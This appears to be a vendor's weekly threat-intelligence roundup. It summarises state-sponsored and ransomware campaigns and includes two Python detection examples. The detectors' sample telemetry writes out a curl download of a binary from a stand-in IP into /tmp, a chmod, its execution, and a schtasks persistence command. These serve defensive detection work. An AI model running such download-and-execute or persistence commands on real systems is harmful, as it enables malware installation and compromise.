Microsoft reports on lessons learned during the first four months of the cyber war between Russia and Ukraine. Russia has been observed increasing intelligence activities against Ukraine's allies, with the goal of collecting sensitive information from NATO and Western powers.
The Anvilogic Threat Reports
Here you can find an accumulation of trending threats published weekly by our Anvilogic team, The Anvilogic Forge. We are committed to helping the community detect attacks: helping your team look for malicious exploit strings and run exposure checks on your endpoint devices and servers, which can help identify a successful payload delivery and compromise using a given vulnerability.
- Tactical: Detectable threat behaviors for response with threat scenarios or threat identifiers
- Strategic: General information security news, for awareness
About the Team
The Anvilogic Forge is a team of security professionals dedicated to tracking threats and crafting reliable detection strategies for our trusted clients while contributing to our peers in the security industry.
Our mission is to assess the operational behaviors of all threats to provide the community, and our customers, with actionable information and enterprise-ready detections in order to defend themselves in an ever-changing threat landscape.
We curate threat intelligence to provide situational awareness and actionable intelligence to our clients. The results of our craft are:
- Threat Identifiers: atomic detections that serve as the foundation of our detection framework.
- Threat Scenarios: risk, pattern, and sequence-based detections utilizing the outputs of Threat Identifiers as a means of identifying actual threats.
- Reports hot off the forge:
  - Threat News Reports
  - Trending Threat Reports
  - Research Articles
If this information is useful, please feel free to get in touch with us to see how Anvilogic can help you grow your security operations at firstname.lastname@example.org.
Sign-up for Anvilogic’s weekly threat reports and receive a threat round-up, active notifications of relevant threats to harden your security posture, and ready-to-deploy threat detection logic & content associated with applicable trending threats.
If you are not a customer but would like to get the detection code for a specific vulnerability or exploit, reach out to us; we're happy to help: email@example.com
Learn More about The Anvilogic Threat Detection and Incident Response (TDIR) Platform
Since the second quarter of 2022, McAfee Labs has observed a rising use of LNK (shortcut) files in attacks to deliver malware such as Emotet, Qakbot and IcedID.
META, a new information-stealing malware, has been gaining popularity among cybercriminals. Research from SANS and BleepingComputer shows the malware has been distributed through malspam campaigns.
Potential Attack on Indian Electricity Grid by RedEcho
Industry: Critical Infrastructure | Level: Strategic | Source: RecordedFuture
Activity tracked by Recorded Future suggests that a cyber attack was initiated by the Chinese state-sponsored threat group RedEcho, targeting India's power grid. The attacks specifically targeted seven Indian State Load Despatch Centres (SLDCs) in North India, to disrupt the flow and dispatch of electricity. Geographically, the activity is near the Ladakh border, an area that is a focus of border conflict between India and China. Recorded Future's director Jonathan Condra offers the following assessment of the intrusion activity: “We believe that the targeting of the Indian power sector is likely for prepositioning purposes or intelligence collection with an eye towards having the capability to disrupt the Indian power sector in the event of kinetic conflict between China and India, and/or for signaling purposes to India – showcasing a capability for deterrence purposes. The targeting of the emergency system may be motivated by more traditional intelligence collection goals, but we cannot confirm at this time.”
ALPHV Ransomware Hits North Carolina A&T University
Industry: Education | Level: Strategic | Source: TheRecord
ALPHV/Blackcat ransomware has compromised North Carolina A&T University, as the institution has appeared on the ransomware group's victim site. The attack appears to have occurred between March 7th and 11th, taking advantage of reduced staffing during the university's spring break. As reported by The Record, the attack inhibited network communications including “wireless connections, Blackboard instruction, single sign-on websites, VPN, Jabber, Qualtrics, Banner Document Management and Chrome River. Some of the services are still down.” In addition, compromised personal information includes social security numbers, financial data, and SQL and email database information. The university is still recovering from the attack, with services slowly being restored; however, the impact has affected students, some of whom are unable to complete class assignments or participate in class, with sessions being canceled due to the ongoing issues.
Nordex Group’s Cyber Attack
Industry: Manufacturing | Level: Strategic | Source: Nordex
The Nordex Group, a wind turbine manufacturer headquartered in Germany, suffered a cyberattack on March 31st, 2022, resulting in the “precautionary” shutdown of its IT systems in various locations. The company maintains factories in Germany, China, Mexico, the United States, Brazil, Spain and India, with no details on which locations were impacted. The company's press statement says the intrusion activity was at an “early stage,” adding that its incident response procedures were executed immediately: “The incident response team of internal and external security experts has been set up immediately in order to contain the issue and prevent further propagation and to assess the extent of potential exposure.” Nordex Group has not released any additional updates regarding the incident.
Cado Security reports on Denonia, a new malware identified targeting AWS Lambda to deploy cryptominers. The Lambda-specific components of the malware were observed during dynamic analysis: when its execution failed, it referenced AWS Lambda environment variables.
Industry: N/A | Level: Tactical | Source: Trend Micro
Trend Micro has tracked exploitation of Spring Core (CVE-2022-22965, Spring4Shell) and Spring Cloud Function (CVE-2022-22963) leading to the installation of Mirai malware. The earliest exploitation attempts tracked by the firm were in the Singapore region. Threat actors exploiting the vulnerability uploaded a web shell, which was used to download the Mirai botnet malware; after a permission change with chmod, the downloaded malware is executed. Lastly, a shell script downloads binaries from an attacker-owned server to install Mirai samples built for different CPU architectures onto the victim host.
- Anvilogic Scenario: Unix File Download, Modified, Executed
- Anvilogic Use Cases:
  - Spring4Shell – CVE-2022-22965
  - Spring-Cloud-Function – CVE-2022-22963
  - Potential Web Shell
  - File Download (Unix)
  - File Modified for Execution
  - File Execution (Unix)
  - Rare shell script execution
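The Threat Identifier / Threat Scenario split described in the About section, applied to the download, chmod and execute chain above, as an added example (not Anvilogic's detection content): three atomic identifiers each return the file path they fired on, and the scenario correlates them per host and path, in order, inside a time window. The key=value event format, hostnames, paths and the address 198.51.100.23 are constructed for illustration, not real telemetry.

```python
# Added example (not Anvilogic code): atomic threat identifiers feeding a
# sequence-based threat scenario. Event format, hosts, paths and the address
# 198.51.100.23 are constructed for illustration, not real telemetry.
import re
import shlex
from collections import namedtuple
from datetime import datetime, timedelta
from typing import List, Optional

# web01 shows download -> chmod -> execute; build01 downloads and chmods a file
# but never runs it, so only web01 should trigger the scenario.
SAMPLE_EVENTS = """\
2022-04-08T10:01:02Z host=web01 user=tomcat cmd="curl -o /tmp/.m/x86 http://198.51.100.23/bins/x86"
2022-04-08T10:01:03Z host=web01 user=tomcat cmd="chmod +x /tmp/.m/x86"
2022-04-08T10:01:04Z host=web01 user=tomcat cmd="/tmp/.m/x86"
2022-04-08T11:00:00Z host=build01 user=ci cmd="curl -o /tmp/ci/tool.sh https://example.internal/tool.sh"
2022-04-08T11:02:00Z host=build01 user=ci cmd="chmod 755 /tmp/ci/tool.sh"
2022-04-08T11:02:30Z host=build01 user=ci cmd="ls -la /tmp/ci"
"""
LINE_RE = re.compile(r'^(\S+) host=(\S+) user=(\S+) cmd="([^"]*)"$')
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # common staging locations

Event = namedtuple("Event", "ts host user cmd")


def parse_events(text: str) -> List[Event]:
    """Parse key=value lines; lines that do not match the shape are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, host, user, cmd = m.groups()
            events.append(Event(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), host, user, cmd))
    return events


def _base(path: str) -> str:
    return path.rsplit("/", 1)[-1]


# Threat identifiers: each returns the file path it fired on, or None.
def ti_file_download(ev: Event) -> Optional[str]:
    """File Download (Unix): curl -o PATH or wget -O PATH."""
    argv = shlex.split(ev.cmd)
    flag = {"curl": "-o", "wget": "-O"}.get(_base(argv[0])) if argv else None
    for i in range(1, len(argv) - 1):
        if flag and argv[i] == flag:
            return argv[i + 1]
    return None


def ti_file_modified_for_execution(ev: Event) -> Optional[str]:
    """File Modified for Execution: chmod setting an execute bit (+x or an odd octal digit)."""
    argv = shlex.split(ev.cmd)
    args = [a for a in argv[1:] if not a.startswith("-")]  # drop options such as -R
    if not argv or _base(argv[0]) != "chmod" or len(args) < 2:
        return None
    mode, target = args[0], args[-1]
    numeric = mode.isdigit() and any(int(d) & 1 for d in mode[-3:])
    return target if ("+" in mode and "x" in mode) or numeric else None


def ti_file_execution(ev: Event) -> Optional[str]:
    """File Execution (Unix): a binary launched directly from a staging directory."""
    argv = shlex.split(ev.cmd)
    return argv[0] if argv and argv[0].startswith(WRITABLE_DIRS) else None


IDENTIFIERS = [
    ("File Download (Unix)", ti_file_download),
    ("File Modified for Execution", ti_file_modified_for_execution),
    ("File Execution (Unix)", ti_file_execution),
]


def scenario_download_modified_executed(events: List[Event],
                                        window: timedelta = timedelta(minutes=30)) -> List[dict]:
    """Unix File Download, Modified, Executed: download, chmod and execution of the same
    path on the same host, in that order, all within `window` of the download."""
    by_key = {}  # (host, path) -> [(identifier name, event), ...]
    for ev in events:
        for name, ti in IDENTIFIERS:
            path = ti(ev)
            if path:
                by_key.setdefault((ev.host, path), []).append((name, ev))
    alerts = []
    for (host, path), hits in by_key.items():
        hits.sort(key=lambda h: h[1].ts)
        downloaded = modified = None
        for name, ev in hits:
            if name == "File Download (Unix)":
                downloaded, modified = ev, None  # a fresh download restarts the chain
            elif downloaded is None or ev.ts - downloaded.ts > window:
                continue  # out of order or outside the window
            elif name == "File Modified for Execution":
                modified = ev
            elif name == "File Execution (Unix)" and modified is not None:
                alerts.append({"host": host, "path": path, "user": ev.user,
                               "downloaded": downloaded.ts.isoformat(), "executed": ev.ts.isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for alert in scenario_download_modified_executed(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

Keying on host and path and requiring the stages in order is what keeps the scenario quiet on build01, which downloads and chmods a file but never runs it; the window is the knob to tune against legitimate install scripts, and shrinking it to a second or two drops the web01 alert as well.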
Mandiant’s Research of FIN7
Industry: Financial Services, Food, Medical, Technology, Transportation, Utilities | Level: Tactical | Source: Mandiant
Mandiant provided updated research tracking the evolution of FIN7's threat activity between late 2021 and early 2022. The threat group has many associations and overlaps with ransomware operations, including Maze, Darkside, Blackmatter and ALPHV/Blackcat. Mandiant adds that the link between FIN7 and ransomware is identified through “Data theft extortion or ransomware deployment following FIN7-attributed activity at multiple organizations, as well as technical overlaps, suggests that FIN7 actors have been associated with various ransomware operations over time.” FIN7 targets a variety of industries, including financial services, food, medical, technology, transportation, and utilities. Activity associated with FIN7 is abundant, and Mandiant has been tracking multiple UNCs (uncategorized threat groups) that appear to be affiliated with FIN7. The threat group has continuously refined its arsenal; for example, its PowerShell backdoor PowerPlant has gone through multiple iterations since 2022 and has been observed more frequently in newer intrusions, as opposed to older malware such as LOADOUT and GRIFFON.
- Anvilogic Use Cases:
  - Suspicious Executable by CMD.exe
  - Windows Admin$ Share Access
  - Windows Service Created
  - Executable Process from Suspicious Folder
  - Common Reconnaissance Commands
  - RDP Connection
  - RDP Logon/Logoff Event
  - Rundll32 Command Line
  - Create/Add Local/Domain User
  - Query Registry
APT10/Cicada Espionage Attacks
Industry: Government, Legal, Non-Governmental Organizations (NGOs), Pharmaceutical, Religious, Telecommunications | Level: Tactical | Source: Symantec
Symantec has been tracking an espionage campaign spanning several months (earliest signs in mid-2021), tied to the Chinese APT group APT10 (aka Cicada, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team). The group has previously targeted Japan-linked companies; recently, however, it has expanded its attacks globally, including Europe, Asia, and North America. Entities targeted by the group include government, legal, religious, and non-governmental organizations (NGOs); the current campaign appears to focus on government and NGO entities. Whereas APT10 previously focused primarily on Japanese companies, only one victim in Japan was identified in the present campaign. Techniques used in the campaign involved exploiting Microsoft Exchange servers for initial access, with various tools used during the attack phase including WinRAR for data archival, Mimikatz, WMIExec, NBTScan, and the group's custom tool Sodamaster. Sodamaster is capable of evading sandbox checks, enumerating the host, and downloading additional payloads.
- Anvilogic Use Cases:
  - Common Reconnaissance Commands
  - Utility Archive Data
  - Wscript/Cscript Execution
  - WinRM Tools
  - Query Registry
New AsyncRAT & 3LOSH Crypter Malware Campaigns
Industry: N/A | Level: Tactical | Source: Cisco Talos
Cisco Talos's latest research tracking malware distribution campaigns has identified the use of the 3LOSH crypter to obfuscate the deployment of commodity malware including AsyncRAT and LimeRAT. An ISO disk image initiates the infection chain with a VBScript that launches PowerShell to create and execute a series of scripts. Persistence is achieved through a scheduled task created by the PowerShell script. Once the series of .bat and .ps1 scripts has completed, the remote access trojan payload is injected and executed. Cisco Talos has observed these 3LOSH crypter campaigns for several months, and activity appears to be increasing as attackers turn to the 3LOSH crypter to evade detection in corporate environments.
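The ISO to VBScript to PowerShell to scheduled-task chain described above is a process-ancestry question rather than a single-event one. The following is an added example, not Cisco Talos's or Anvilogic's code: it reconstructs parent/child chains from constructed Windows process-creation records and flags a `schtasks /create` whose ancestry contains PowerShell under a script host that ran a script from a non-system drive. The PIDs, paths and command lines are hypothetical, and it assumes a mounted ISO image shows up under its own drive letter (E: here).

```python
# Added example (not Cisco Talos or Anvilogic code): reconstruct process ancestry
# from constructed Windows process-creation events and flag a scheduled-task
# creation whose ancestors are PowerShell under a script host that ran a script
# from a non-system drive (assumption: an attached ISO gets its own drive letter).
# PIDs, paths and command lines below are hypothetical.
from collections import namedtuple
from typing import Dict, List

Proc = namedtuple("Proc", "pid ppid image cmdline")

SAMPLE_PROCS = [
    Proc(800, 600, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Chain under test: wscript runs a .vbs from E: (mounted image), spawns PowerShell, which creates a task.
    Proc(912, 800, r"C:\Windows\System32\wscript.exe", r'wscript.exe "E:\invoice.vbs"'),
    Proc(950, 912, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"powershell.exe -File C:\Users\Public\stage1.ps1"),
    Proc(988, 950, r"C:\Windows\System32\schtasks.exe",
         r'schtasks.exe /create /sc minute /mo 5 /tn "Updater" /tr C:\Users\Public\run.bat'),
    # Benign: an administrator creating a task from an interactive PowerShell under explorer.
    Proc(1200, 800, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    Proc(1210, 1200, r"C:\Windows\System32\schtasks.exe",
         r'schtasks.exe /create /sc daily /tn "Backup" /tr C:\Tools\backup.exe'),
]
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_task_creation(p: Proc) -> bool:
    return image_name(p.image) == "schtasks.exe" and "/create" in p.cmdline.lower()


def is_powershell(p: Proc) -> bool:
    return image_name(p.image) in ("powershell.exe", "pwsh.exe")


def script_from_other_drive(p: Proc, system_drive: str = "C:") -> bool:
    """Wscript/Cscript running a script whose path sits on a drive other than the system drive."""
    if image_name(p.image) not in ("wscript.exe", "cscript.exe"):
        return False
    for tok in p.cmdline.replace('"', " ").split():
        other_drive = len(tok) > 2 and tok[0].isalpha() and tok[1] == ":" and tok[:2].upper() != system_drive.upper()
        if other_drive and tok.lower().endswith(SCRIPT_EXTS):
            return True
    return False


def ancestry(p: Proc, by_pid: Dict[int, Proc], max_depth: int = 16) -> List[Proc]:
    """Walk ppid links upward from p; stops at an unknown parent or at max_depth."""
    chain = [p]
    while chain[-1].ppid in by_pid and len(chain) < max_depth:
        chain.append(by_pid[chain[-1].ppid])
    return chain


def scenario_iso_script_powershell_task(procs: List[Proc]) -> List[dict]:
    """Alert when schtasks /create has a PowerShell ancestor that itself descends from a
    script host running a script off a non-system drive."""
    by_pid = {p.pid: p for p in procs}  # simplification: PID reuse is ignored here
    alerts = []
    for p in procs:
        if not is_task_creation(p):
            continue
        chain = ancestry(p, by_pid)
        seen_powershell = False
        for anc in chain[1:]:
            if is_powershell(anc):
                seen_powershell = True
            elif seen_powershell and script_from_other_drive(anc):
                alerts.append({"pid": p.pid, "task_cmd": p.cmdline,
                               "chain": [image_name(a.image) for a in reversed(chain)]})
                break
    return alerts


if __name__ == "__main__":
    for alert in scenario_iso_script_powershell_task(SAMPLE_PROCS):
        print(alert)
```

The benign task created from an interactive PowerShell session under explorer.exe does not alert because nothing above the PowerShell is a script host, which is the point of checking the whole ancestry rather than only the immediate parent. On real telemetry the `by_pid` map would need process start times to disambiguate reused PIDs.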
Malwarebytes provided analysis of Colibri Loader, a malware that emerged on underground forums in August 2021. The malware is advertised to “people who have large volumes of traffic and lack of time to work out the material.”